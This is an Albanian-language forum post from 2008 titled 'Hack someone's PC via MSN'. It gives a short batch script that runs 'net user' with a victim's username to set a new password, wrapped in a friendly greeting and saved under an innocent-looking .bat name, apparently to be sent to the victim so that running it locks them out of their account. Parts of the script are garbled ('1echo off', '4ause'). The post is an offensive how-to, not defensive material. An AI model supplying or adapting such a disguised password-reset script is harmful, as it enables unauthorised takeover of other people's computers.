betim kastrati

betim kastrati
 
HomeHome  FAQFAQ  SearchSearch  MemberlistMemberlist  UsergroupsUsergroups  RegisterRegister  Log inLog in  

Share
 

 Hacko Pc Dikujna Permes MSN

Go down 
AuthorMessage
betim kastratiPosts : 102
Join date : 2008-08-14

Hacko Pc Dikujna Permes MSN Empty
PostSubject: Hacko Pc Dikujna Permes MSN   Hacko Pc Dikujna Permes MSN Icon_minitimeThu Aug 14, 2008 9:29 am

kjo osht per ata qe nuk e kan kuptu ata te paren qe kjo osht ni menyr me e leht une e kom provu 100% funksionon per te funksionuar kjo duhet te dini net userin e atij qe deshironi tja hackoni pc kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

1echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "tung i dashuri shok "
4ause

je nje spjegim me konktret

1echo off
2:net user arlindpeja *123456*
3:echo tung i dashuri shok
4ause

mos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikė bat( .bat ) psh.. tung shoku im.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon
Back to top Go down
View user profile
 
Hacko Pc Dikujna Permes MSN
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
betim kastrati :: Your first category :: Your first forum-
Jump to: